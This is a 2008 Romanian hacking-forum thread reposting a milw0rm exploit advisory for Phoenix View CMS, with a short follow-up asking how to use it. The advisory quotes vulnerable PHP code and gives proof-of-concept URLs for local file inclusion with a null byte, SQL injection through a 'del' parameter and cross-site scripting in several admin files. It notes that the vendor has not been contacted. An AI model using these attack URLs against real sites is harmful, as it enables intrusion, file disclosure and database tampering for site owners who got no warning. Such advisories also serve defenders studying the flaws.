tw8 Posted May 10, 2008 Report Share Posted May 10, 2008 Link: http://milw0rm.com/exploits/5578Multe multumiri lui kw3rln ... stie el de ce .#########################################################################################Phoenix View CMS <= Pre Alpha2 Multiple Vulnerabilities [LFI][SQLI][XSS]#########################################################################################Found by : tw8Date : 8.05.2008Website && Forum : http://rstcenter.com && http://rstcenter.com/forum/Bug type : LFI, SQLI & XSS#########################################################################################Affected software description:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Application : Phoenix View CMSVersion : <= Pre Alpha2Vendor : http://sourceforge.net/projects/phoenixviewcms/Description :Phoenix View CMS is going to be an easy to use Content-Managemen-System. It's using aself-written Template-Engine. The CMS will use a self-written API and it's gonna beeasy to write your own plugins and modules.########################################################################################Vulnerabilities:~~~~~~~~~~~~~~~Vulnerable code #1 in admin/admin_frame.php [LFI]+[XSS]:---------------------------------------------------------------------------- if(isset($_GET["ltarget"])) { $ltarget=$_GET["ltarget"]; $_SESSION["lastsecaction"]='';}...... if(!file_exists(SYSTEM_ADMIN_path . "/" . $ltarget . ".php")) { printError("System Admin Seite \"" . $ltarget . "\" wurde nicht gefunden."); } else { include SYSTEM_ADMIN_path . $ltarget . ".php"; }---------------------------------------------------------------------------- POC #1: http://www.target.com/path/admin/admin_frame.php?ltarget=[LOCAL FILE]%00 http://www.target.com/path/admin/admin_frame.php?ltarget=[XSS]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerable code #2 admin/module/*.php [SQLI]:---------------------------------------------------------------------------- class db {...... function query($query,$ressave=false) { if($ressave) return mysql_query($query); else { $this->res = mysql_query($query); return $this->res; } }......}...... if(isset($_GET["del"])) { $db->query("DELETE from " . SYSTEM_dbpref . "todo where id='".$_GET["del"]."'"); echo "<font color='green'>Löschen erfolgreich</font>\n";}/*Vulnerable files:gbuch.admin.phplinks.admin.phpmenue.admin.phpnews.admin.phptodo.admin.php*/---------------------------------------------------------------------------- POC #2: http://www.target.com/path/admin/module/vulnerable_file.php?del=[SQLI]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerable code #3 admin/module/*.php [XSS]:---------------------------------------------------------------------------- <input type='hidden' name='conf' value='<?php if(isset($_GET["conf"])) echo $_GET["conf"];else echo $_POST["conf"]; ?>' />/*Vulnerable files:gbuch.admin.phplinks.admin.phpmenue.admin.phpnews.admin.phptodo.admin.php*/---------------------------------------------------------------------------- POC #3: http://www.target.com/path/admin/module/vulnerable_file.php?conf=[XSS]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Status:~~~~~~~Vendor has not been contacted yet.###########################################################################Shoutz to vladiii, kw3rln, Nemessis, Kenpachi, Moubik, DranaXum, Inside, str0ke & all RST Members.###########################################################################Contact:~~~~~~~ Website: http://rstcenter.com Forum: http://rstcenter.com/forum E-Mail: ym_tw8[at]yahoo[dot]com################################ [ EOF ] ################################### milw0rm.com [2008-05-09] Quote Link to comment Share on other sites More sharing options...
baston Posted May 14, 2008 Report Share Posted May 14, 2008 cum se umbla cu programul asat ? Quote Link to comment Share on other sites More sharing options...
